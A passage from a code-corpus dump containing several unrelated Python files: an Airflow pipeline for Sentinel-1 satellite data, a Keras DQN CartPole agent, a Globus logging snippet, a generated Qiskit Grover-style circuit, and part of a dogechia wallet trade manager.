from geoserver_plugin import publish_product
import config as CFG
import config.s1_grd_1sdv as S1GRD1SDV
log = logging.getLogger(__name__)
# Settings
default_args = {
##################################################
# General configuration
#
'start_date': datetime.now() - timedelta(hours=1),
'owner': 'airflow',
'depends_on_past': False,
'provide_context': True,
'email': ['[email protected]'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'max_threads': 1,
'max_active_runs': 1,
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
#
}
print("#######################")
print("Interval: {}".format(S1GRD1SDV.dag_schedule_interval))
print("ID: {}".format(S1GRD1SDV.id))
print("DHUS: {} @ {}, Region: {}".format(CFG.dhus_username, CFG.dhus_url, S1GRD1SDV.dhus_search_bbox) )
print("GeoServer: {} @ {}".format(CFG.geoserver_username, CFG.geoserver_rest_url) )
print("RSYNC: {} @ {} using {}".format(CFG.rsync_username, CFG.rsync_hostname, CFG.rsync_ssh_key))
print("Date: {} / {}".format(S1GRD1SDV.dhus_search_startdate, S1GRD1SDV.dhus_search_enddate))
print("Search: max={}, order_by={}, keywords={}".format(S1GRD1SDV.dhus_filter_max, S1GRD1SDV.dhus_search_orderby,S1GRD1SDV.dhus_search_keywords))
print("Paths:\n collection_dir={}\n download_dir={}\n process_dir={}\n original_package_upload_dir={}\n repository_dir={}".format(S1GRD1SDV.collection_dir, S1GRD1SDV.download_dir, S1GRD1SDV.process_dir, S1GRD1SDV.original_package_upload_dir, S1GRD1SDV.repository_dir))
print("Collection:\n workspace={}\n layer={}".format(S1GRD1SDV.geoserver_workspace, S1GRD1SDV.geoserver_layer))
print("#######################")
TARGET_SRS = 'EPSG:4326'
TILE_SIZE = 512
OVERWRITE = True
RESAMPLING_METHOD = 'average'
MAX_OVERVIEW_LEVEL = 512
def prepare_band_paths(get_inputs_from, *args, **kwargs):
"""Get Product / Band files path Dictionary from ZipInspector and extract the list of band files """
task_instance = kwargs['ti']
# band number from task name
task_id = task_instance.task_id
band_number = int(task_id.split('_')[-1])
log.info("Getting inputs from: " + get_inputs_from)
product_bands_dict = task_instance.xcom_pull(task_ids=get_inputs_from, key=XCOM_RETURN_KEY)
if product_bands_dict is None:
log.info("No input from ZipInspector. Nothing to do")
return None
log.info("Product Band Dictionary: {}".format(pprint.pformat(product_bands_dict)))
files_path=[]
for k in product_bands_dict:
files_path += product_bands_dict[k]
# Push one of the band paths to XCom
file_path = files_path[band_number - 1]
return [file_path]
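# Illustrative XCom payload from the ZipInspector task (the exact keys depend on
# the product; this shape is assumed from the loop above):
#     {'S1A_IW_GRDH_...SAFE': ['/path/to/...-vv-....tiff', '/path/to/...-vh-....tiff']}
# get_band_paths_1 would then return the first band file, get_band_paths_2 the second.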
# DAG definition
dag = DAG(S1GRD1SDV.id,
description='DAG for searching, filtering and downloading Sentinel 1 data from DHUS server',
schedule_interval=S1GRD1SDV.dag_schedule_interval,
catchup=False,
default_args=default_args
)
# DHUS Search Task Operator
search_task = DHUSSearchOperator(task_id='search_product_task',
dhus_url=CFG.dhus_url,
dhus_user=CFG.dhus_username,
dhus_pass=CFG.dhus_password,
geojson_bbox=S1GRD1SDV.dhus_search_bbox,
startdate=S1GRD1SDV.dhus_search_startdate,
enddate=S1GRD1SDV.dhus_search_enddate,
filter_max=S1GRD1SDV.dhus_filter_max,
order_by=S1GRD1SDV.dhus_search_orderby,
keywords=S1GRD1SDV.dhus_search_keywords,
dag=dag)
# DHUS Download Task Operator
download_task = DHUSDownloadOperator(task_id='download_product_task',
dhus_url=CFG.dhus_url,
dhus_user=CFG.dhus_username,
dhus_pass=CFG.dhus_password,
download_max=S1GRD1SDV.dhus_download_max,
download_dir=S1GRD1SDV.download_dir,
get_inputs_from=search_task.task_id,
download_timeout=timedelta(hours=12),
dag=dag)
# Rsync Archive Task for Products
archive_task = RSYNCOperator(task_id="upload_original_package",
host = CFG.rsync_hostname,
remote_usr = CFG.rsync_username,
ssh_key_file = CFG.rsync_ssh_key,
remote_dir = S1GRD1SDV.original_package_upload_dir,
get_inputs_from=download_task.task_id,
dag=dag)
# Zip Inspector and Extractor Task
zip_task = ZipInspector(task_id='zip_inspector',
extension_to_search='tiff',
get_inputs_from=download_task.task_id,
dag=dag)
warp_tasks = []
addo_tasks = []
upload_tasks = []
band_paths_tasks = []
for i in range(1, 3):
band_paths = PythonOperator(task_id="get_band_paths_" + str(i),
python_callable=prepare_band_paths,
op_kwargs={
'get_inputs_from': zip_task.task_id
},
dag=dag)
band_paths_tasks.append(band_paths)
warp = GDALWarpOperator(
task_id='gdalwarp_' + str(i),
target_srs=TARGET_SRS,
tile_size=TILE_SIZE,
overwrite=OVERWRITE,
dstdir=S1GRD1SDV.process_dir,
get_inputs_from=band_paths.task_id,
dag=dag
)
warp_tasks.append(warp)
addo = GDALAddoOperator(
trigger_rule=TriggerRule.ALL_SUCCESS,
resampling_method=RESAMPLING_METHOD,
max_overview_level=MAX_OVERVIEW_LEVEL,
task_id='gdal_addo_' + str(i),
get_inputs_from=warp.task_id,
dag=dag
)
addo_tasks.append(addo)
upload = RSYNCOperator(task_id="upload_granule_{}_task".format(str(i)),
host=CFG.rsync_hostname,
remote_usr=CFG.rsync_username,
ssh_key_file=CFG.rsync_ssh_key,
remote_dir=S1GRD1SDV.repository_dir,
get_inputs_from=addo.task_id,
dag=dag)
upload_tasks.append(upload)
band_paths.set_upstream(zip_task)
warp.set_upstream(band_paths)
addo.set_upstream(warp)
upload.set_upstream(addo)
# Metadata Extraction task
# use lists rather than single-use generators, since these ids may be iterated more than once
addo_task_ids = [task.task_id for task in addo_tasks]
upload_task_ids = [task.task_id for task in upload_tasks]
metadata_task = S1MetadataOperator(task_id="extract_metadata_task",
product_safe_path=None,
granules_paths=None,
granules_upload_dir=S1GRD1SDV.repository_dir,
processing_dir=S1GRD1SDV.process_dir,
original_package_download_base_url=S1GRD1SDV.original_package_download_base_url,
gs_workspace=S1GRD1SDV.geoserver_workspace,
bands_dict = S1GRD1SDV.bands_dict,
gs_wms_layer=S1GRD1SDV.geoserver_layer,
gs_wfs_featuretype=S1GRD1SDV.geoserver_featuretype,
gs_wfs_format=S1GRD1SDV.geoserver_oseo_wfs_format,
gs_wfs_version=S1GRD1SDV.geoserver_oseo_wfs_version,
gs_wms_width=S1GRD1SDV.geoserver_oseo_wms_width,
gs_wms_height=S1GRD1SDV.geoserver_oseo_wms_height,
gs_wms_format=S1GRD1SDV.geoserver_oseo_wms_format,
gs_wms_version=S1GRD1SDV.geoserver_oseo_wms_version,
gs_wcs_coverage_id=S1GRD1SDV.geoserver_coverage,
gs_wcs_scale_i=S1GRD1SDV.geoserver_oseo_wcs_scale_i,
gs_wcs_scale_j=S1GRD1SDV.geoserver_oseo_wcs_scale_j,
gs_wcs_format=S1GRD1SDV.geoserver_oseo_wcs_format,
gs_wcs_version=S1GRD1SDV.geoserver_oseo_wcs_version,
get_inputs_from = {
'download_task_id': download_task.task_id,
'addo_task_ids': addo_task_ids,
'upload_task_ids': upload_task_ids,
'archive_product_task_id' : archive_task.task_id,
},
dag=dag)
# Publish product.zip to GeoServer
publish_task = PythonOperator(task_id="publish_product_task",
python_callable=publish_product,
op_kwargs={
'geoserver_username': CFG.geoserver_username,
'geoserver_password': CFG.geoserver_password,
                                  'geoserver_rest_endpoint': '{}/oseo/collections/{}/products'.format(CFG.geoserver_rest_url, S1GRD1SDV.geoserver_oseo_collection),
                                  'get_inputs_from': metadata_task.task_id,
},
dag = dag)
if CFG.eoxserver_rest_url:
publish_eox_task = PythonOperator(task_id="publish_product_eox_task",
python_callable=publish_product,
op_kwargs={
'geoserver_username': CFG.eoxserver_username,
'geoserver_password': CFG.eoxserver_password,
'geoserver_rest_endpoint': CFG.eoxserver_rest_url,
'get_inputs_from': metadata_task.task_id,
},
dag = dag)
download_task.set_upstream(search_task)
archive_task.set_upstream(download_task)
zip_task.set_upstream(download_task)
metadata_task.set_upstream(download_task)
metadata_task.set_upstream(archive_task)
for task in upload_tasks:
metadata_task.set_upstream(task)
publish_task.set_upstream(metadata_task)
if CFG.eoxserver_rest_url:
publish_eox_task.set_upstream(metadata_task)
|
py | 1a37bfbd28e93c0b476a569b1c1fa632ad2e5fef | # -*- coding: utf-8 -*-
import random
import gym
import numpy as np
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import adam_v2
EPISODES = 1000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=2000)
self.gamma = 0.95 # discount rate
self.epsilon = 1.0 # exploration rate
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
self.model = self._build_model()
def _build_model(self):
# Neural Net for Deep-Q learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation='relu'))
model.add(Dense(24, activation='relu'))
model.add(Dense(self.action_size, activation='linear'))
        model.compile(loss='mse',
                      optimizer=adam_v2.Adam(learning_rate=self.learning_rate))
return model
def memorize(self, state, action, reward, next_state, done):
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
        # epsilon-greedy: explore with probability epsilon, otherwise act greedily
        if np.random.rand() <= self.epsilon:
            return random.randrange(self.action_size)
act_values = self.model.predict(state)
return np.argmax(act_values[0]) # returns action
def replay(self, batch_size):
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
            # Bellman target: immediate reward, plus the discounted value of the
            # best next action when the episode has not terminated
            target = reward
            if not done:
                target = (reward + self.gamma *
                          np.amax(self.model.predict(next_state)[0]))
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
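            # Worked example (made-up numbers): with gamma = 0.95, reward = 1 and
            # max_a' Q(s', a') = 2.0, the fitted target for the taken action is
            # 1 + 0.95 * 2.0 = 2.9; the other actions keep their predicted values.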
if self.epsilon > self.epsilon_min:
self.epsilon *= self.epsilon_decay
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
env = gym.make('CartPole-v1')
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size, action_size)
# agent.load("./save/cartpole-dqn.h5")
done = False
batch_size = 4
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, [1, state_size])
for time in range(500):
# env.render()
action = agent.act(state)
next_state, reward, done, _ = env.step(action)
reward = reward if not done else -10
next_state = np.reshape(next_state, [1, state_size])
agent.memorize(state, action, reward, next_state, done)
state = next_state
if done:
print("episode: {}/{}, score: {}, e: {:.2}"
.format(e, EPISODES, time, agent.epsilon))
break
if len(agent.memory) > batch_size:
agent.replay(batch_size)
if e % 10 == 0:
agent.save("./save/cartpole-dqn.h5") |
py | 1a37bfebce4750ee21f32e5cd22d8f1bba3ed51f | # AUTHENTICATION_BACKENDS = ('shub.plugins.globus.backend.GlobusOAuth2',)
# Show Globus log messages
import logging
logger = logging.getLogger("globus_sdk")
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.DEBUG)
|
py | 1a37c0c094d6f21f5dbf814b52b3cc46eb174f05 | # qubit number=5
# total number=56
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
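# Example: for n = 2 and an f that marks only "11",
#     build_oracle(2, lambda rep: str(int(rep == "11")))
# applies no X gates and a single mcu1(pi) across the pair, i.e. a plain CZ.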
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[0]) # number=53
prog.cz(input_qubit[2],input_qubit[0]) # number=54
prog.h(input_qubit[0]) # number=55
prog.z(input_qubit[2]) # number=46
prog.cx(input_qubit[2],input_qubit[0]) # number=47
prog.h(input_qubit[1]) # number=4
prog.rx(2.664070570244145,input_qubit[1]) # number=39
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[2]) # number=49
prog.cz(input_qubit[3],input_qubit[2]) # number=50
prog.h(input_qubit[2]) # number=51
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[3]) # number=40
prog.y(input_qubit[4]) # number=35
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=25
prog.cz(input_qubit[1],input_qubit[0]) # number=26
prog.h(input_qubit[0]) # number=27
prog.h(input_qubit[0]) # number=36
prog.cz(input_qubit[1],input_qubit[0]) # number=37
prog.h(input_qubit[0]) # number=38
prog.cx(input_qubit[1],input_qubit[0]) # number=41
prog.x(input_qubit[0]) # number=42
prog.cx(input_qubit[1],input_qubit[0]) # number=43
prog.cx(input_qubit[1],input_qubit[0]) # number=34
prog.cx(input_qubit[1],input_qubit[0]) # number=24
prog.cx(input_qubit[0],input_qubit[1]) # number=29
prog.cx(input_qubit[2],input_qubit[3]) # number=44
prog.x(input_qubit[1]) # number=30
prog.cx(input_qubit[0],input_qubit[1]) # number=31
prog.x(input_qubit[2]) # number=11
prog.x(input_qubit[3]) # number=12
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.z(input_qubit[1]) # number=52
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = FakeVigo()
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy1523.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
py | 1a37c12381e172d11e4198d6fb936bf85df3f93d | import logging
import time
import traceback
from pathlib import Path
from secrets import token_bytes
from typing import Any, Dict, List, Optional, Tuple
from blspy import AugSchemeMPL
from dogechia.types.blockchain_format.coin import Coin
from dogechia.types.blockchain_format.program import Program
from dogechia.types.blockchain_format.sized_bytes import bytes32
from dogechia.types.spend_bundle import SpendBundle
from dogechia.types.coin_solution import CoinSolution
from dogechia.util.byte_types import hexstr_to_bytes
from dogechia.util.db_wrapper import DBWrapper
from dogechia.util.hash import std_hash
from dogechia.util.ints import uint32, uint64
from dogechia.wallet.cc_wallet import cc_utils
from dogechia.wallet.cc_wallet.cc_utils import CC_MOD, SpendableCC, spend_bundle_for_spendable_ccs, uncurry_cc
from dogechia.wallet.cc_wallet.cc_wallet import CCWallet
from dogechia.wallet.puzzles.genesis_by_coin_id_with_0 import genesis_coin_id_for_genesis_coin_checker
from dogechia.wallet.trade_record import TradeRecord
from dogechia.wallet.trading.trade_status import TradeStatus
from dogechia.wallet.trading.trade_store import TradeStore
from dogechia.wallet.transaction_record import TransactionRecord
from dogechia.wallet.util.trade_utils import (
get_discrepancies_for_spend_bundle,
get_output_amount_for_puzzle_and_solution,
get_output_discrepancy_for_puzzle_and_solution,
)
from dogechia.wallet.util.transaction_type import TransactionType
from dogechia.wallet.util.wallet_types import WalletType
from dogechia.wallet.wallet import Wallet
from dogechia.wallet.wallet_coin_record import WalletCoinRecord
class TradeManager:
wallet_state_manager: Any
log: logging.Logger
trade_store: TradeStore
@staticmethod
async def create(
wallet_state_manager: Any,
db_wrapper: DBWrapper,
name: str = None,
):
self = TradeManager()
if name:
self.log = logging.getLogger(name)
else:
self.log = logging.getLogger(__name__)
self.wallet_state_manager = wallet_state_manager
self.trade_store = await TradeStore.create(db_wrapper)
return self
async def get_offers_with_status(self, status: TradeStatus) -> List[TradeRecord]:
records = await self.trade_store.get_trade_record_with_status(status)
return records
async def get_coins_of_interest(
self,
) -> Tuple[Dict[bytes32, Coin], Dict[bytes32, Coin]]:
"""
        Returns the coins we want to check for inclusion in the filter.
        These include coins that belong to us and coins on the other side of the trade.
"""
all_pending = []
pending_accept = await self.get_offers_with_status(TradeStatus.PENDING_ACCEPT)
pending_confirm = await self.get_offers_with_status(TradeStatus.PENDING_CONFIRM)
pending_cancel = await self.get_offers_with_status(TradeStatus.PENDING_CANCEL)
all_pending.extend(pending_accept)
all_pending.extend(pending_confirm)
all_pending.extend(pending_cancel)
removals = {}
additions = {}
for trade in all_pending:
for coin in trade.removals:
removals[coin.name()] = coin
for coin in trade.additions:
additions[coin.name()] = coin
return removals, additions
async def get_trade_by_coin(self, coin: Coin) -> Optional[TradeRecord]:
all_trades = await self.get_all_trades()
for trade in all_trades:
if trade.status == TradeStatus.CANCELED.value:
continue
if coin in trade.removals:
return trade
if coin in trade.additions:
return trade
return None
async def coins_of_interest_farmed(self, removals: List[Coin], additions: List[Coin], height: uint32):
"""
        If both our coins and the other party's coins in the trade got removed, the trade was
        successfully executed. If coins from the other side of the trade got farmed without ours,
        the trade failed: either someone else completed the trade, or the other party canceled it
        by doing a spend. If our coins got farmed but the other side's coins didn't, we
        successfully canceled the trade by spending our inputs.
"""
removal_dict = {}
addition_dict = {}
checked: Dict[bytes32, Coin] = {}
for coin in removals:
removal_dict[coin.name()] = coin
for coin in additions:
addition_dict[coin.name()] = coin
all_coins = []
all_coins.extend(removals)
all_coins.extend(additions)
for coin in all_coins:
if coin.name() in checked:
continue
trade = await self.get_trade_by_coin(coin)
if trade is None:
            self.log.error(f"Coin: {coin}, not in any trade")
continue
# Check if all coins that are part of the trade got farmed
# If coin is missing, trade failed
failed = False
for removed_coin in trade.removals:
if removed_coin.name() not in removal_dict:
self.log.error(f"{removed_coin} from trade not removed")
failed = True
checked[removed_coin.name()] = removed_coin
for added_coin in trade.additions:
if added_coin.name() not in addition_dict:
self.log.error(f"{added_coin} from trade not added")
failed = True
                checked[added_coin.name()] = added_coin
if failed is False:
# Mark this trade as successful
await self.trade_store.set_status(trade.trade_id, TradeStatus.CONFIRMED, True, height)
self.log.info(f"Trade with id: {trade.trade_id} confirmed at height: {height}")
else:
# Either we canceled this trade or this trade failed
if trade.status == TradeStatus.PENDING_CANCEL.value:
await self.trade_store.set_status(trade.trade_id, TradeStatus.CANCELED, True)
self.log.info(f"Trade with id: {trade.trade_id} canceled at height: {height}")
elif trade.status == TradeStatus.PENDING_CONFIRM.value:
await self.trade_store.set_status(trade.trade_id, TradeStatus.FAILED, True)
self.log.warning(f"Trade with id: {trade.trade_id} failed at height: {height}")
async def get_locked_coins(self, wallet_id: int = None) -> Dict[bytes32, WalletCoinRecord]:
"""Returns a dictionary of confirmed coins that are locked by a trade."""
all_pending = []
pending_accept = await self.get_offers_with_status(TradeStatus.PENDING_ACCEPT)
pending_confirm = await self.get_offers_with_status(TradeStatus.PENDING_CONFIRM)
pending_cancel = await self.get_offers_with_status(TradeStatus.PENDING_CANCEL)
all_pending.extend(pending_accept)
all_pending.extend(pending_confirm)
all_pending.extend(pending_cancel)
if len(all_pending) == 0:
return {}
result = {}
for trade_offer in all_pending:
if trade_offer.tx_spend_bundle is None:
locked = await self.get_locked_coins_in_spend_bundle(trade_offer.spend_bundle)
else:
locked = await self.get_locked_coins_in_spend_bundle(trade_offer.tx_spend_bundle)
for name, record in locked.items():
if wallet_id is None or record.wallet_id == wallet_id:
result[name] = record
return result
    async def get_all_trades(self):
        # avoid shadowing the builtin `all`
        trades: List[TradeRecord] = await self.trade_store.get_all_trades()
        return trades
async def get_trade_by_id(self, trade_id: bytes) -> Optional[TradeRecord]:
record = await self.trade_store.get_trade_record(trade_id)
return record
async def get_locked_coins_in_spend_bundle(self, bundle: SpendBundle) -> Dict[bytes32, WalletCoinRecord]:
"""Returns a list of coin records that are used in this SpendBundle"""
result = {}
removals = bundle.removals()
for coin in removals:
coin_record = await self.wallet_state_manager.coin_store.get_coin_record(coin.name())
if coin_record is None:
continue
result[coin_record.name()] = coin_record
return result
async def cancel_pending_offer(self, trade_id: bytes32):
await self.trade_store.set_status(trade_id, TradeStatus.CANCELED, False)
async def cancel_pending_offer_safely(self, trade_id: bytes32):
"""This will create a transaction that includes coins that were offered"""
self.log.info(f"Secure-Cancel pending offer with id trade_id {trade_id.hex()}")
trade = await self.trade_store.get_trade_record(trade_id)
if trade is None:
return None
all_coins = trade.removals
for coin in all_coins:
wallet = await self.wallet_state_manager.get_wallet_for_coin(coin.name())
if wallet is None:
continue
new_ph = await wallet.get_new_puzzlehash()
if wallet.type() == WalletType.COLOURED_COIN.value:
tx = await wallet.generate_signed_transaction(
[coin.amount], [new_ph], 0, coins={coin}, ignore_max_send_amount=True
)
else:
tx = await wallet.generate_signed_transaction(
coin.amount, new_ph, 0, coins={coin}, ignore_max_send_amount=True
)
await self.wallet_state_manager.add_pending_transaction(tx_record=tx)
await self.trade_store.set_status(trade_id, TradeStatus.PENDING_CANCEL, False)
return None
async def save_trade(self, trade: TradeRecord):
await self.trade_store.add_trade_record(trade, False)
async def create_offer_for_ids(
self, offer: Dict[int, int], file_name: str
) -> Tuple[bool, Optional[TradeRecord], Optional[str]]:
success, trade_offer, error = await self._create_offer_for_ids(offer)
if success is True and trade_offer is not None:
self.write_offer_to_disk(Path(file_name), trade_offer)
await self.save_trade(trade_offer)
return success, trade_offer, error
async def _create_offer_for_ids(self, offer: Dict[int, int]) -> Tuple[bool, Optional[TradeRecord], Optional[str]]:
"""
        Offer is a dictionary mapping wallet ids to amounts.
"""
spend_bundle = None
try:
for id in offer.keys():
amount = offer[id]
wallet_id = uint32(int(id))
wallet = self.wallet_state_manager.wallets[wallet_id]
if isinstance(wallet, CCWallet):
balance = await wallet.get_confirmed_balance()
if balance < abs(amount) and amount < 0:
raise Exception(f"insufficient funds in wallet {wallet_id}")
if amount > 0:
if spend_bundle is None:
to_exclude: List[Coin] = []
else:
to_exclude = spend_bundle.removals()
zero_spend_bundle: SpendBundle = await wallet.generate_zero_val_coin(False, to_exclude)
if spend_bundle is None:
spend_bundle = zero_spend_bundle
else:
spend_bundle = SpendBundle.aggregate([spend_bundle, zero_spend_bundle])
additions = zero_spend_bundle.additions()
removals = zero_spend_bundle.removals()
zero_val_coin: Optional[Coin] = None
for add in additions:
if add not in removals and add.amount == 0:
zero_val_coin = add
new_spend_bundle = await wallet.create_spend_bundle_relative_amount(amount, zero_val_coin)
else:
new_spend_bundle = await wallet.create_spend_bundle_relative_amount(amount)
elif isinstance(wallet, Wallet):
if spend_bundle is None:
to_exclude = []
else:
to_exclude = spend_bundle.removals()
new_spend_bundle = await wallet.create_spend_bundle_relative_dogechia(amount, to_exclude)
else:
return False, None, "unsupported wallet type"
if new_spend_bundle is None or new_spend_bundle.removals() == []:
raise Exception(f"Wallet {id} was unable to create offer.")
if spend_bundle is None:
spend_bundle = new_spend_bundle
else:
spend_bundle = SpendBundle.aggregate([spend_bundle, new_spend_bundle])
if spend_bundle is None:
return False, None, None
now = uint64(int(time.time()))
trade_offer: TradeRecord = TradeRecord(
confirmed_at_index=uint32(0),
accepted_at_time=None,
created_at_time=now,
my_offer=True,
sent=uint32(0),
spend_bundle=spend_bundle,
tx_spend_bundle=None,
additions=spend_bundle.additions(),
removals=spend_bundle.removals(),
trade_id=std_hash(spend_bundle.name() + bytes(now)),
status=uint32(TradeStatus.PENDING_ACCEPT.value),
sent_to=[],
)
return True, trade_offer, None
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Error with creating trade offer: {type(e)}{tb}")
return False, None, str(e)
def write_offer_to_disk(self, file_path: Path, offer: TradeRecord):
if offer is not None:
file_path.write_text(bytes(offer).hex())
async def get_discrepancies_for_offer(self, file_path: Path) -> Tuple[bool, Optional[Dict], Optional[Exception]]:
self.log.info(f"trade offer: {file_path}")
trade_offer_hex = file_path.read_text()
trade_offer = TradeRecord.from_bytes(bytes.fromhex(trade_offer_hex))
return get_discrepancies_for_spend_bundle(trade_offer.spend_bundle)
async def get_inner_puzzle_for_puzzle_hash(self, puzzle_hash) -> Program:
info = await self.wallet_state_manager.puzzle_store.get_derivation_record_for_puzzle_hash(puzzle_hash.hex())
assert info is not None
puzzle = self.wallet_state_manager.main_wallet.puzzle_for_pk(bytes(info.pubkey))
return puzzle
async def maybe_create_wallets_for_offer(self, file_path: Path) -> bool:
success, result, error = await self.get_discrepancies_for_offer(file_path)
if not success or result is None:
return False
for key, value in result.items():
wsm = self.wallet_state_manager
wallet: Wallet = wsm.main_wallet
if key == "dogechia":
continue
self.log.info(f"value is {key}")
exists = await wsm.get_wallet_for_colour(key)
if exists is not None:
continue
await CCWallet.create_wallet_for_cc(wsm, wallet, key)
return True
async def respond_to_offer(self, file_path: Path) -> Tuple[bool, Optional[TradeRecord], Optional[str]]:
has_wallets = await self.maybe_create_wallets_for_offer(file_path)
if not has_wallets:
return False, None, "Unknown Error"
trade_offer = None
try:
trade_offer_hex = file_path.read_text()
trade_offer = TradeRecord.from_bytes(hexstr_to_bytes(trade_offer_hex))
except Exception as e:
return False, None, f"Error: {e}"
if trade_offer is not None:
offer_spend_bundle: SpendBundle = trade_offer.spend_bundle
coinsols: List[CoinSolution] = [] # [] of CoinSolutions
cc_coinsol_outamounts: Dict[bytes32, List[Tuple[CoinSolution, int]]] = dict()
aggsig = offer_spend_bundle.aggregated_signature
cc_discrepancies: Dict[bytes32, int] = dict()
dogechia_discrepancy = None
wallets: Dict[bytes32, Any] = dict() # colour to wallet dict
for coinsol in offer_spend_bundle.coin_solutions:
puzzle: Program = Program.from_bytes(bytes(coinsol.puzzle_reveal))
solution: Program = Program.from_bytes(bytes(coinsol.solution))
# work out the deficits between coin amount and expected output for each
r = cc_utils.uncurry_cc(puzzle)
if r:
# Calculate output amounts
mod_hash, genesis_checker, inner_puzzle = r
colour = bytes(genesis_checker).hex()
if colour not in wallets:
wallets[colour] = await self.wallet_state_manager.get_wallet_for_colour(colour)
unspent = await self.wallet_state_manager.get_spendable_coins_for_wallet(wallets[colour].id())
if coinsol.coin in [record.coin for record in unspent]:
return False, None, "can't respond to own offer"
innersol = solution.first()
total = get_output_amount_for_puzzle_and_solution(inner_puzzle, innersol)
if colour in cc_discrepancies:
cc_discrepancies[colour] += coinsol.coin.amount - total
else:
cc_discrepancies[colour] = coinsol.coin.amount - total
# Store coinsol and output amount for later
if colour in cc_coinsol_outamounts:
cc_coinsol_outamounts[colour].append((coinsol, total))
else:
cc_coinsol_outamounts[colour] = [(coinsol, total)]
else:
# standard dogechia coin
unspent = await self.wallet_state_manager.get_spendable_coins_for_wallet(1)
if coinsol.coin in [record.coin for record in unspent]:
return False, None, "can't respond to own offer"
if dogechia_discrepancy is None:
dogechia_discrepancy = get_output_discrepancy_for_puzzle_and_solution(coinsol.coin, puzzle, solution)
else:
dogechia_discrepancy += get_output_discrepancy_for_puzzle_and_solution(coinsol.coin, puzzle, solution)
coinsols.append(coinsol)
dogechia_spend_bundle: Optional[SpendBundle] = None
if dogechia_discrepancy is not None:
dogechia_spend_bundle = await self.wallet_state_manager.main_wallet.create_spend_bundle_relative_dogechia(
dogechia_discrepancy, []
)
if dogechia_spend_bundle is not None:
for coinsol in coinsols:
dogechia_spend_bundle.coin_solutions.append(coinsol)
zero_spend_list: List[SpendBundle] = []
spend_bundle = None
# create coloured coin
self.log.info(cc_discrepancies)
for colour in cc_discrepancies.keys():
if cc_discrepancies[colour] < 0:
my_cc_spends = await wallets[colour].select_coins(abs(cc_discrepancies[colour]))
else:
if dogechia_spend_bundle is None:
to_exclude: List = []
else:
to_exclude = dogechia_spend_bundle.removals()
my_cc_spends = await wallets[colour].select_coins(0)
if my_cc_spends is None or my_cc_spends == set():
zero_spend_bundle: SpendBundle = await wallets[colour].generate_zero_val_coin(False, to_exclude)
if zero_spend_bundle is None:
return (
False,
None,
"Unable to generate zero value coin. Confirm that you have dogechia available",
)
zero_spend_list.append(zero_spend_bundle)
additions = zero_spend_bundle.additions()
removals = zero_spend_bundle.removals()
my_cc_spends = set()
for add in additions:
if add not in removals and add.amount == 0:
my_cc_spends.add(add)
if my_cc_spends == set() or my_cc_spends is None:
return False, None, "insufficient funds"
# Create SpendableCC list and innersol_list with both my coins and the offered coins
# Firstly get the output coin
my_output_coin = my_cc_spends.pop()
spendable_cc_list = []
innersol_list = []
genesis_id = genesis_coin_id_for_genesis_coin_checker(Program.from_bytes(bytes.fromhex(colour)))
# Make the rest of the coins assert the output coin is consumed
for coloured_coin in my_cc_spends:
inner_solution = self.wallet_state_manager.main_wallet.make_solution(consumed=[my_output_coin.name()])
